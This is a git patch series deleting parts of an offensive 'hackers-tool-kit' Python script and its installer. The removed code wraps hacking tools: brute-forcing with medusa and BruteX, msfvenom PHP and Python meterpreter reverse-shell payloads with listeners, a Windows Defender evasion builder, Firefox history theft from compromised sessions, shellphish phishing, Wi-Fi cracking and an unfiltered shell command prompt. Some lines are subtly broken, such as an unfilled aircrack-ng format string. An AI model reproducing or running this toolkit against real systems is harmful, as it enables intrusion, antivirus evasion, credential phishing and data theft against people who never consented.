hs='8bceaeed74c17571c15cdb9494e992db3c263695' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109460") - def sha1sha1pass(): - hs='3109b810188fcde0900f9907d2ebcaa10277d10e' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109480") - def sha1sha1passsalt(): - hs='780d43fa11693b61875321b6b54905ee488d7760' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109500") - def sha1sha1passsubstrpass03(): - hs='5ed6bc680b59c580db4a38df307bd4621759324e' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109520") - def sha1sha1saltpass(): - hs='70506bac605485b4143ca114cbd4a3580d76a413' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109540") - def sha1sha1sha1pass(): - hs='3328ee2a3b4bf41805bd6aab8e894a992fa91549' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109560") - def sha1strtolowerusernamepass(): - hs='79f575543061e158c2da3799f999eb7c95261f07' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109580") - - def Haval192(): - hs='cd3a90a3bebd3fa6b6797eba5dab8441f16a7dfa96c6e641' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("110040") - def Haval192HMAC(): - hs='39b4d8ecf70534e2fd86bb04a877d01dbf9387e640366029' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("110080") - def Tiger192(): - hs='c086184486ec6388ff81ec9f235287270429b2253b248a70' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("110020") - def Tiger192HMAC(): - hs='8e914bb64353d4d29ab680e693272d0bd38023afa3943a41' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("110060") - - def MD5passsaltjoomla1(): - hs='35d1c0d69a2df62be2df13b087343dc9:BeKMviAfcXeTPTlX' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[32:33].find(':')==0: - jerar.append("112020") - - def SHA1Django(): - hs='sha1$Zion3R$299c3d65a0dcab1fc38421783d64d0ecf4113448' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:5].find('sha1$')==0: - jerar.append("113020") - - def Haval224(): - hs='f65d3c0ef6c56f4c74ea884815414c24dbf0195635b550f47eac651a' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("114040") - def Haval224HMAC(): - hs='f10de2518a9f7aed5cf09b455112114d18487f0c894e349c3c76a681' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("114080") - def SHA224(): - hs='e301f414993d5ec2bd1d780688d37fe41512f8b57f6923d054ef8e59' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("114020") - def SHA224HMAC(): - hs='c15ff86a859892b5e95cdfd50af17d05268824a6c9caaa54e4bf1514' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("114060") - - def SHA256(): - hs='2c740d20dab7f14ec30510a11f8fd78b82bc3a711abe8a993acdb323e78e6d5e' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115020") - def SHA256HMAC(): - hs='d3dd251b7668b8b6c12e639c681e88f2c9b81105ef41caccb25fcde7673a1132' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115120") - def Haval256(): - hs='7169ecae19a5cd729f6e9574228b8b3c91699175324e6222dec569d4281d4a4a' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115040") - def Haval256HMAC(): - hs='6aa856a2cfd349fb4ee781749d2d92a1ba2d38866e337a4a1db907654d4d4d7a' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115140") - def GOSTR341194(): - hs='ab709d384cce5fda0793becd3da0cb6a926c86a8f3460efb471adddee1c63793' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115060") - def RipeMD256(): - hs='5fcbe06df20ce8ee16e92542e591bdea706fbdc2442aecbf42c223f4461a12af' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115080") - def RipeMD256HMAC(): - hs='43227322be1b8d743e004c628e0042184f1288f27c13155412f08beeee0e54bf' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115160") - def SNEFRU256(): - hs='3a654de48e8d6b669258b2d33fe6fb179356083eed6ff67e27c5ebfa4d9732bb' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115100") - def SNEFRU256HMAC(): - hs='4e9418436e301a488f675c9508a2d518d8f8f99e966136f2dd7e308b194d74f9' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115180") - def SHA256md5pass(): - hs='b419557099cfa18a86d1d693e2b3b3e979e7a5aba361d9c4ec585a1a70c7bde4' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115200") - def SHA256sha1pass(): - hs='afbed6e0c79338dbfe0000efe6b8e74e3b7121fe73c383ae22f5b505cb39c886' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115220") - - def MD5passsaltjoomla2(): - hs='fb33e01e4f8787dc8beb93dac4107209:fxJUXVjYRafVauT77Cze8XwFrWaeAYB2' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[32:33].find(':')==0: - jerar.append("116020") - def SAM(): - hs='4318B176C3D8E3DEAAD3B435B51404EE:B7C899154197E8A2A33121D76A240AB5' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash.islower()==False and hash[32:33].find(':')==0: - jerar.append("116040") - - def SHA256Django(): - hs='sha256$Zion3R$9e1a08aa28a22dfff722fad7517bae68a55444bb5e2f909d340767cec9acf2c3' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:6].find('sha256')==0: - jerar.append("117020") - - def RipeMD320(): - hs='b4f7c8993a389eac4f421b9b3b2bfb3a241d05949324a8dab1286069a18de69aaf5ecc3c2009d8ef' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("118020") - def RipeMD320HMAC(): - hs='244516688f8ad7dd625836c0d0bfc3a888854f7c0161f01de81351f61e98807dcd55b39ffe5d7a78' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("118040") - - def SHA384(): - hs='3b21c44f8d830fa55ee9328a7713c6aad548fe6d7a4a438723a0da67c48c485220081a2fbc3e8c17fd9bd65f8d4b4e6b' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("119020") - def SHA384HMAC(): - hs='bef0dd791e814d28b4115eb6924a10beb53da47d463171fe8e63f68207521a4171219bb91d0580bca37b0f96fddeeb8b' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("119040") - - def SHA256s(): - hs='$6$g4TpUQzk$OmsZBJFwvy6MwZckPvVYfDnwsgktm2CckOlNJGy9HNwHSuHFvywGIuwkJ6Bjn3kKbB6zoyEjIYNMpHWBNxJ6g.' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$6$')==0: - jerar.append("120020") - - def SHA384Django(): - hs='sha384$Zion3R$88cfd5bc332a4af9f09aa33a1593f24eddc01de00b84395765193c3887f4deac46dc723ac14ddeb4d3a9b958816b7bba' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:6].find('sha384')==0: - print " [+] SHA-384(Django)" - jerar.append("121020") - - def SHA512(): - hs='ea8e6f0935b34e2e6573b89c0856c81b831ef2cadfdee9f44eb9aa0955155ba5e8dd97f85c73f030666846773c91404fb0e12fb38936c56f8cf38a33ac89a24e' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("122020") - def SHA512HMAC(): - hs='dd0ada8693250b31d9f44f3ec2d4a106003a6ce67eaa92e384b356d1b4ef6d66a818d47c1f3a2c6e8a9a9b9bdbd28d485e06161ccd0f528c8bbb5541c3fef36f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("122060") - def Whirlpool(): - hs='76df96157e632410998ad7f823d82930f79a96578acc8ac5ce1bfc34346cf64b4610aefa8a549da3f0c1da36dad314927cebf8ca6f3fcd0649d363c5a370dddb' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("122040") - def WhirlpoolHMAC(): - hs='77996016cf6111e97d6ad31484bab1bf7de7b7ee64aebbc243e650a75a2f9256cef104e504d3cf29405888fca5a231fcac85d36cd614b1d52fce850b53ddf7f9' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("122080") - - - print logo - while True: - jerar=[] - print """ - -------------------------------------------------------------------------""" - hash = raw_input(" HASH: ") - ADLER32(); CRC16(); CRC16CCITT(); CRC32(); CRC32B(); DESUnix(); DomainCachedCredentials(); FCS16(); GHash323(); GHash325(); GOSTR341194(); Haval128(); Haval128HMAC(); Haval160(); Haval160HMAC(); Haval192(); Haval192HMAC(); Haval224(); Haval224HMAC(); Haval256(); Haval256HMAC(); LineageIIC4(); MD2(); MD2HMAC(); MD4(); MD4HMAC(); MD5(); MD5APR(); MD5HMAC(); MD5HMACWordpress(); MD5phpBB3(); MD5Unix(); MD5Wordpress(); MD5Half(); MD5Middle(); MD5passsaltjoomla1(); MD5passsaltjoomla2(); MySQL(); MySQL5(); MySQL160bit(); NTLM(); RAdminv2x(); RipeMD128(); RipeMD128HMAC(); RipeMD160(); RipeMD160HMAC(); RipeMD256(); RipeMD256HMAC(); RipeMD320(); RipeMD320HMAC(); SAM(); SHA1(); SHA1Django(); SHA1HMAC(); SHA1MaNGOS(); SHA1MaNGOS2(); SHA224(); SHA224HMAC(); SHA256(); SHA256s(); SHA256Django(); SHA256HMAC(); SHA256md5pass(); SHA256sha1pass(); SHA384(); SHA384Django(); SHA384HMAC(); SHA512(); SHA512HMAC(); SNEFRU128(); SNEFRU128HMAC(); SNEFRU256(); SNEFRU256HMAC(); Tiger128(); Tiger128HMAC(); Tiger160(); Tiger160HMAC(); Tiger192(); Tiger192HMAC(); Whirlpool(); WhirlpoolHMAC(); XOR32(); md5passsalt(); md5saltmd5pass(); md5saltpass(); md5saltpasssalt(); md5saltpassusername(); md5saltmd5pass(); md5saltmd5passsalt(); md5saltmd5passsalt(); md5saltmd5saltpass(); md5saltmd5md5passsalt(); md5username0pass(); md5usernameLFpass(); md5usernamemd5passsalt(); md5md5pass(); md5md5passsalt(); md5md5passmd5salt(); md5md5saltpass(); md5md5saltmd5pass(); md5md5usernamepasssalt(); md5md5md5pass(); md5md5md5md5pass(); md5md5md5md5md5pass(); md5sha1pass(); md5sha1md5pass(); md5sha1md5sha1pass(); md5strtouppermd5pass(); sha1passsalt(); sha1saltpass(); sha1saltmd5pass(); sha1saltmd5passsalt(); sha1saltsha1pass(); sha1saltsha1saltsha1pass(); sha1usernamepass(); sha1usernamepasssalt(); sha1md5pass(); sha1md5passsalt(); sha1md5sha1pass(); sha1sha1pass(); sha1sha1passsalt(); sha1sha1passsubstrpass03(); sha1sha1saltpass(); sha1sha1sha1pass(); sha1strtolowerusernamepass() - - if len(jerar)==0: - print "" - print " Not Found." - elif len(jerar)>2: - jerar.sort() - print "" - print "Possible Hashs:" - print "[+] ",algorithms[jerar[0]] - print "[+] ",algorithms[jerar[1]] - print "" - print "Least Possible Hashs:" - for a in range(int(len(jerar))-2): - print "[+] ",algorithms[jerar[a+2]] - else: - jerar.sort() - print "" - print "Possible Hashs:" - for a in range(len(jerar)): - print "[+] ",algorithms[jerar[a]] -#------------------# -#FIND HASH TYPE END# - - -#RESTART SCRIPT START# -#--------------------# -def restart(): - os.system("clear") - os.system("cd /root/hackers-tool-kit && python htk.py") -#------------------# -#RESTART SCRIPT END# - - -#MEDUSA AUTOMATED START# -#----------------------# -def medusa(): - k = raw_input("Target Host: ") - u = raw_input("User: ") - p = raw_input("Wordlist: ") - os.system("cat /root/hackers-tool-kit/tools/medusamods.txt") - print "\n" - m = raw_input("Module: ") - n = raw_input("Port: ") - a = 'medusa -h {0} -u {1} -P {2} -M {3} -n {4}'.format(k,u,p,m,n) - os.system(a) -#--------------------# -#MEDUSA AUTOMATED END# - - -#WAF DETECTER START# -#------------------# -def wafwoof(): - j = raw_input("Enter Target: ") - k = 'wafw00f {0}'.format(j) - os.system(k) -#----------------# -#WAF DETECTER END# - - -#CLOUDFLARE BYPASS START# -#-----------------------# -def cloud(): - - subdomainlist = ["ftp", "cpanel", "webmail" , "mail" , "www", "www1", "www2", "www3", "www4", "www5","ns1", "ns2" , "forums" , "blog"] - - print ('\033[1m' + "CLOUDFLARE BYPASS SCRIPT ") - - host = raw_input("Enter Target: ") - for sublist in subdomainlist: - try: - hosts = str(sublist) + "." + str(host) - showip = socket.gethostbyname(str(hosts)) - print " Cloudflare has begun to be bypassed "+str(showip)+' :| '+str(hosts) - except: - pass - - print ( '\033[93m' + "Credit Goes To: tugrulbey.com") - print ( '\033[92m' + "Credit Goes To: tztugrulbey@protonmail.com") -#---------------------# -#CLOUDFLARE BYPASS END# - - -#BRUTEFORCE ALL SERVICES ON WEB START# -#------------------------------------# -def brutex(): - k = raw_input("Target: ") - p = raw_input("Port: ") - a = 'brutex {0} {1}'.format(k,p) - os.system(a) -#----------------------------------# -#BRUTEFORCE ALL SERVICES ON WEB END# - - -#METERPRETER HELP MENU START# -#---------------------------# -def methelp(): - os.system("cat /root/hackers-tool-kit/tools/meterpreter.txt") -#-------------------------# -#METERPRETER HELP MENU END# - - -#WINDOWS DEFENDER BYPASS START# -#-----------------------------# -def winbyp(): - os.system("cat /root/hackers-tool-kit/tools/payloads.txt") - pay = raw_input("Payload: ") - port = raw_input("Port: ") - name = raw_input("File Name: ") - os.system('echo "use evasion/windows/windows_defender_exe\n" > winbyp.rc') - os.system('echo "set payload {0}\n" >> winbyp.rc'.format(pay)) - os.system('echo "set LHOST 127.0.0.1\n" >> winbyp.rc') - os.system('echo "set LPORT {0}\n" >> winbyp.rc'.format(port)) - os.system('echo "set filename {0}.exe\n" >> winbyp.rc'.format(name)) - os.system('echo "run\n" >> winbyp.rc') - os.system("service postgresql restart") - os.system('msfconsole -r winbyp.rc') - os.system('rm -rf winbyp.rc') -#---------------------------# -#WINDOWS DEFENDER BYPASS END# - - -#USE A EXPLOIT START# -#-------------------# -def exploit(): - os.system("cat /root/hackers-tool-kit/tools/exploits.txt") - print "\n" - f = raw_input("Select Exploit: ") - os.system('echo "use {0}\n" >> exploit.rc'.format(f)) - os.system('echo "show options\n" >> exploit.rc'.format(f)) - os.system("service postgresql restart") - os.system('msfconsole -r exploit.rc') - os.system('rm -rf exploit.rc') -#-----------------# -#USE A EXPLOIT END# - - -#PHISHING AUTOMATED START# -#------------------------# -def phish(): - os.system("bash /root/shellphish/shellphish.sh") -#----------------------# -#PHISHING AUTOMATED END# - - -#LIST DATABASE INFO START# -#------------------------# -def datalist(): - os.system('echo "hosts\n" >> data.rc') - os.system('echo "services\n" >> data.rc') - os.system("service postgresql restart") - os.system('msfconsole -r data.rc') - os.system('rm -rf data.rc') -#----------------------# -#LIST DATABASE INFO END# - - -#ALL METASPLOIT EVASIONS START# -#-----------------------------# -def msfev(): - os.system("service postgresql start") - os.system("""msfconsole -x 'show evasion'""") -#---------------------------# -#ALL METASPLOIT EVASIONS END# - - -#FULLY UPDATE YOUR OS START# -#--------------------------# -def upgrade(): - os.system("apt update && apt upgrade") -#------------------------# -#FULLY UPDATE YOUR OS END# - - -#USE A NMAP SCRIPT START# -#-----------------------# -def nscript(): - os.system("cat /root/hackers-tool-kit/tools/scripts.txt") - print "\n" - j = raw_input(G+"Select Script:\033[0m ") - k = raw_input(G+"Target:\033[0m ") - a = 'nmap --script {0} {1}'.format(j,k) - os.system(a) -#---------------------# -#USE A NMAP SCRIPT END# - - -#GET HOST SSH VERSION START# -#--------------------------# -def sshver(): - f = raw_input(G+"Target: \033[0m") - g = raw_input(G+"Port: \033[0m") - t = raw_input(G+"Threads: \033[0m") - b = raw_input(G+"Timeout: \033[0m") - os.system('echo "use auxiliary/scanner/ssh/ssh_version\n" >> sshver.rc') - os.system('echo "set RHOSTS {0}\n" >> sshver.rc'.format(f)) - os.system('echo "set RPORT {0}\n" >> sshver.rc'.format(g)) - os.system('echo "set THREADS {0}\n" >> sshver.rc'.format(t)) - os.system('echo "set TIMEOUT {0}\n" >> sshver.rc'.format(b)) - os.system('echo "show options\n" >> sshver.rc') - os.system('echo "run\n" >> sshver.rc') - os.system("service postgresql restart") - os.system('msfconsole -r sshver.rc') - os.system('rm -rf sshver.rc') -#------------------------# -#GET HOST SSH VERSION END# - - -#USE PROXYCHAINS FOR WEB START# -#-----------------------------# -def chains(): - h = raw_input("Enter Browser: ") - j = raw_input("Enter Website: ") - a = 'proxychains {0} {1}'.format(h,j) - os.system(a) -#---------------------------# -#USE PROXYCHAINS FOR WEB END# - - -#GET HOST MYSQL VERSION START# -#----------------------------# -def mysqlv(): - f = raw_input(G+"Target: \033[0m") - g = raw_input(G+"Port: \033[0m") - t = raw_input(G+"Threads: \033[0m") - os.system('echo "use auxiliary/scanner/mysql/mysql_version\n" >> mysqlv.rc') - os.system('echo "set RHOSTS {0}\n" >> mysqlv.rc'.format(f)) - os.system('echo "set RPORT {0}\n" >> mysqlv.rc'.format(g)) - os.system('echo "set THREADS {0}\n" >> mysqlv.rc'.format(t)) - os.system('echo "show options\n" >> mysqlv.rc') - os.system('echo "run\n" >> mysqlv.rc') - os.system("service postgresql restart") - os.system('msfconsole -r mysqlv.rc') - os.system('rm -rf mysqlv.rc') -#--------------------------# -#GET HOST MYSQL VERSION END# - - -#CONNECT TO A HOST START# -#-----------------------# -def connect(): - h = raw_input("Enter Host: ") - print "\n" - print " How would you like to connect?" - print "---------------------------------------" - print "ssh: Secure Shell | Default Port = 22" - print "---------------------------------------" - print "telnet: Network Virtual Terminal | Default Port = 23" - print "---------------------------------------" - j = raw_input("Select Protocol: ") - a = '{0} {1}'.format(j,h) - os.system(a) -#---------------------# -#CONNECT TO A HOST END# - - - -#OPEN NEW TERMINAL START# -#-----------------------# -def terminal(): - os.system("gnome-terminal") -#---------------------# -#OPEN NEW TERMINAL END# - - -#AIRCRACK-NG [WIFI HACK] AUTOMATED START# -#---------------------------------------# -def aircrack(): - b = raw_input(G+"BSSID: \033[0m") - e = raw_input(G+"ESSID: \033[0m") - w = raw_input(G+"Wordlist: \033[0m") - h = raw_input(G+"Handshake file: \033[0m") - os.system("iwconfig") - i = raw_input(G+"Interface: \033[0m") - a = 'aircrack-ng -b {0} -e {1} -w {2} {3} {4}' - os.system(a) -#-------------------------------------# -#AIRCRACK-NG [WIFI HACK] AUTOMATED END# - - -#GET SOURCE CODE OF WEB START# -#----------------------------# -def source(): - t = raw_input(B+"Target:\033[0m ") - print Y+"\nWould you like to save source code in a file?\n\033[0m" - q = raw_input(R+"[y/n]:\033[0m ") - if q == "n": - an = 'curl {0}'.format(t) - os.system(an) - if q == "y": - ay = 'curl {0} >> /root/{1}.txt'.format(t,t) - os.system(ay) - print Y+"\nfile saved > /root/{0}.txt\033[0m".format(t) -#--------------------------# -#GET SOURCE CODE OF WEB END# - - -#WEB DIRECTORY SCAN START# -#------------------------# -def dirscan(): - t = raw_input(B+"Target URL:\033[91m ") - print "\033[0m" - a = 'dirb {0}'.format(t) - os.system(a) -#----------------------# -#WEB DIRECTORY SCAN END# - - - -#APACHE SERVER START# -#-------------------# -def aserver(): - gw = os.popen("ip -4 route show default").read().split() - s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) - s.connect((gw[2], 0)) - ipaddr = s.getsockname()[0] - print Y+"Starting Server\033[0m..." - os.system("service apache2 start") - br = raw_input(G+"Browser: \033[0m") - a = '{0} {1}'.format(br,ipaddr) - os.system(a) - stop = raw_input("hit enter to stop server: ") - print Y+"Stopping Server\033[0m..." - os.system("service apache2 stop") -#-----------------# -#APACHE SERVER END# - - -#RUN A FILE START# -#----------------# -def run(): - print Y+"what program do you want to run the file with Example: python" - p = raw_input(N+"Program: ") - print "\n" - print Y+"Example 1: /root/hi/hello.py/ \033[94mExample 2: hello.py\033[0m" - print "\n" - f = raw_input("Enter File: ") - print "\n" - print Y+"would you like to add arguments when running the file [y/n]\033[0m" - yn = raw_input(G+"[y or n]: \033[0m") - if yn == "n" : - a = '{0} {1}'.format(p,f) - os.system(a) - if yn == "y" : - arg = raw_input("Enter Arguments: ") - a = '{0} {1} {2}'.format(p,f,arg) - os.system(a) -#--------------# -#RUN A FILE END# - - -#REFRESH BANNER START# -#--------------------# -def banner(): - os.system("clear") - mainbanner() -#------------------# -#REFRESH BANNER END# - - -#PHP PAYLOAD START# -#-----------------# -def phpload(): - lhost = raw_input("LHOST: ") - lport = raw_input("LPORT: ") - filen = raw_input("File Name: ") - a = 'msfvenom -p php/meterpreter/reverse_tcp LHOST={0} LPORT={1} -o /root/{2}.php'.format(lhost,lport,filen) - os.system(a) - print "\nwould you like to run this file in a multi handler?" - yn = raw_input("[y/n]> ") - if yn == "y": - os.system('echo "use exploit/multi/handler\n" >> phpload.rc') - os.system('echo "set payload php/meterpreter/reverse_tcp\n" >> phpload.rc') - os.system('echo "set LHOST {0}\n" >> phpload.rc'.format(lhost)) - os.system('echo "set LPORT {0}\n" >> phpload.rc'.format(lport)) - os.system('echo "exploit\n" >> phpload.rc') - os.system("service postgresql restart") - os.system('msfconsole -r phpload.rc') - os.system('rm -rf phpload.rc') - if yn == "n": - os.system('echo " "') -#---------------# -#PHP PAYLOAD END# - - -#PYLOAD START# -#------------# -def pyload(): - lhost = raw_input("LHOST: ") - lport = raw_input("LPORT: ") - filen = raw_input("File Name: ") - a = 'msfvenom -p python/meterpreter/reverse_tcp LHOST={0} LPORT={1} -o /root/{2}.py'.format(lhost,lport,filen) - os.system(a) - print "\nwould you like to run this file in a multi handler?" - yn = raw_input("[y/n]> ") - if yn == "y": - os.system('echo "use exploit/multi/handler\n" >> pyload.rc') - os.system('echo "set payload python/meterpreter/reverse_tcp\n" >> pyload.rc') - os.system('echo "set LHOST {0}\n" >> pyload.rc'.format(lhost)) - os.system('echo "set LPORT {0}\n" >> pyload.rc'.format(lport)) - os.system('echo "exploit\n" >> pyload.rc') - os.system("service postgresql restart") - os.system('msfconsole -r pyload.rc') - os.system('rm -rf pyload.rc') - if yn == "n": - os.system('echo " "') -#----------# -#PYLOAD END# - - -#FOXHIS START# -#------------# -def foxhis(): - os.system('echo "sessions\n" >> foxhisses.rc') - os.system('echo "exit\n" >> foxhisses.rc') - os.system("service postgresql restart") - os.system('msfconsole -q -r foxhisses.rc') - os.system('rm -rf foxhisses.rc') - print "\n" - ses = raw_input("Session: ") - print "\nMaximum time (seconds) to wait for a response\n" - time = raw_input("Timeout: ") - os.system('echo "use firefox/gather/history\n" >> foxhis.rc') - os.system('echo "set session {0}\n" >> foxhis.rc'.format(ses)) - os.system('echo "set timeout {0}\n" >> foxhis.rc'.format(time)) - os.system('echo "run\n" >> foxhis.rc') - os.system('msfconsole -q -r foxhis.rc') - os.system('rm -fr foxhis.rc') -#----------# -#FOXHIS END# - - -#RHAWK START# -#-----------# -def rhawk(): - os.system("cd /root/hackers-tool-kit/redhawk/ && php rhawk.php") -#---------# -#RHAWK END# - - -#NANO START# -#----------# -def nano(): - print "opening nano in \033[93m/root/\033[0m folder" - os.system("sleep 2") - os.system("cd /root/ && nano") -#--------# -#NANO END# - - -#UPDATE HACKERS-TOOL-KIT START# -#-----------------------------# -def update(): - os.system("cd /root/hackers-tool-kit/ && python htkupdate.py") -#---------------------------# -#UPDATE HACKERS-TOOL-KIT END# - -#COMPILE C START# -#---------------# -def compilec(): - print "filename / filepath" - r = raw_input("> ") - print "\nfilename2 / filepath2" - h = raw_input("> ") - - a = 'g++ {0} -o {1}'.format(r,h) - os.system(a) -#COMPILE C END# -#-------------# - -#THIS IS THE MAIN PART OF THE SCRIPT LIKE WHERE YOU TYPE WHERE IT RUNS THE COMMANDS SHIT LIKE THAT# -#-------------------------------------------------------------------------------------------------# -def main(): - found = False - while not found: - x = raw_input(N+'\033[91m[\033[0mh-\033[94mT\033[0m-k\033[91m]\033[94m->\033[92m: \033[0m') - if x == "?": - help() - if x == "winload" : - winload() - if x == "clear" : - os.system("clear") - if x == "andload": - andload() - if x == "command": - c = raw_input("Command: ") - os.system(c) - if x == "msfcon" : - os.system("service postgresql start") - os.system("msfconsole") - if x == "set": - os.system("setoolkit") - if x == "msfven": - print R+"!ONLY TYPE THE ARGUMENTS DONT TYPE MSFVENOM\033[0m" - v = raw_input(G+"MSFVENOM: \033[0m") - os.system("msfvenom", v) - if x == "gmail" : - gmail() - if x == "insta": - insta() - if x == "fb" : - fb() - if x == "ipgrab": - ipgrab() - if x == "myip": - myip() - if x == "wifite": - wifite() - if x == "mon" : - mon() - if x == "netdev" : - netdev() - if x == "scannet": - scannet() - if x == "exit" : - import sys - print "follow \033[92m@tuf_unkn0wn\033[0m on instagram" - sys.exit() - if x == "rebootl": - print R+"! ARE YOU SURE YOU WANT TO REBOOT YOUR WHOLE DEVICE !\033[0m" - c = raw_input("[y/n]> ") - if c == "y" : - os.system("reboot") - if c == "n" : - os.system("clear") - mainbanner() - main() - if x == "port": - port() - if x == "info": - info() - if x == "sysinfo": - sysinfo() - if x == "msfex": - msfex() - if x == "udp": - udp() - if x == "tcp": - tcp() - if x == "syn": - syn() - if x == "msfpa": - msfpa() - if x == "msfau": - msfau() - if x == "ping" : - ping() - if x == "multih": - multih() - if x == "msfall": - msfall() - if x == "hydra" : - hydra() - if x == "cupp": - cupp() - if x == "vdir": - vdir() - if x == "monoff": - monoff() - if x == "vpn": - vpn() - if x == "vpnoff": - vpnoff() - if x == "slowl": - slowl() - if x == "pidox": - pidox() - if x == "specnet": - specnet() - if x == "pingen": - pingen() - if x == "reaver": - reaver() - if x == "deauth": - deauth() - if x == "macc": - macc() - if x == "macoff": - macoff() - if x == "arpspoof": - arpspoof() - if x == "sslscan": - sslscan() - if x == "payload": - payload() - if x == "crunch": - crunch() - if x == "traff": - traff() - if x == "resa": - resa() - if x == "resu": - resu() - if x == "hashid": - hashid() - if x == "restart": - restart() - if x == "medusa": - medusa() - if x == "wafwoof": - wafwoof() - if x == "cloud": - cloud() - if x == "brutex": - brutex() - if x == "methelp": - methelp() - if x == "winbyp": - winbyp() - if x == "exploit": - exploit() - if x == "phish": - phish() - if x == "datalist": - datalist() - if x == "msfev": - msfev() - if x == "upgrade": - upgrade() - if x == "nscript": - nscript() - if x == "sshver": - sshver() - if x == "chains": - chains() - if x == "mysqlv": - mysqlv() - if x == "connect": - connect() - if x == "terminal": - terminal() - if x == "aircrack": - aircrack() - if x == "source": - source() - if x == "dirscan": - dirscan() - if x == "aserver": - aserver() - if x == "clearall": - clearall() - if x == "run": - run() - if x == "banner": - banner() - if x == "phpload": - phpload() - if x == "pyload": - pyload() - if x == "foxhis": - foxhis() - if x == "rhawk": - rhawk() - if x == "nano": - nano() - if x == "update": - update() - if x == "compilec": - compilec() - found = True -mainbanner() -main() -#-------------------------------------------------------------------------------------------------# -#THIS IS THE MAIN PART OF THE SCRIPT LIKE WHERE YOU TYPE WHERE IT RUNS THE COMMANDS SHIT LIKE THAT# From c3d213647f8ec5c99a94e5858123c52345f66909 Mon Sep 17 00:00:00 2001 From: tuf_unkn0wn <40415158+unkn0wnh4ckr@users.noreply.github.com> Date: Sun, 1 Dec 2019 04:55:01 +0000 Subject: [PATCH 199/214] Delete install.py --- install.py | 45 --------------------------------------------- 1 file changed, 45 deletions(-) delete mode 100644 install.py diff --git a/install.py b/install.py deleted file mode 100644 index 2f84565..0000000 --- a/install.py +++ /dev/null @@ -1,45 +0,0 @@ -import os -def install(): - os.system("apt install dirb -y") - os.system("apt install sslstrip -y") - os.system("apt install bettercap -y") - os.system("apt install sslscan -y") - os.system("apt install crunch -y") - os.system("apt install tcpdump -y") - os.system("apt install macchanger -y") - os.system("apt install wafw00f -y") - os.system("apt install medusa -y") - os.system("cd /root && git clone https://github.com/thelinuxchoice/shellphish") - os.system("cd /root && git clone https://github.com/1N3/BruteX") - os.system("cd /root/BruteX && ./install.sh") - os.system("apt update") - os.system("pip install future mechanize json whois python-whois requests bs4 requests[socks] urlparse cookielib") - os.system("pip install scapy datetime argparse re threading urllib2 modules builtwith smtplib") - os.system("pip install whois") - os.system("pip install builtwith") - os.system("pip install colorama") - os.system("pip install 